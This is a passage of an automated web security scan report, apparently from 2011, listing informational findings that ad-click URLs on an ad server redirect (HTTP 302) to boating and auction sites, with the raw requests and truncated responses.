Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.186. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:07:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.194. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:24 GMT
Server: Apache/2.2.3 (Red Hat)
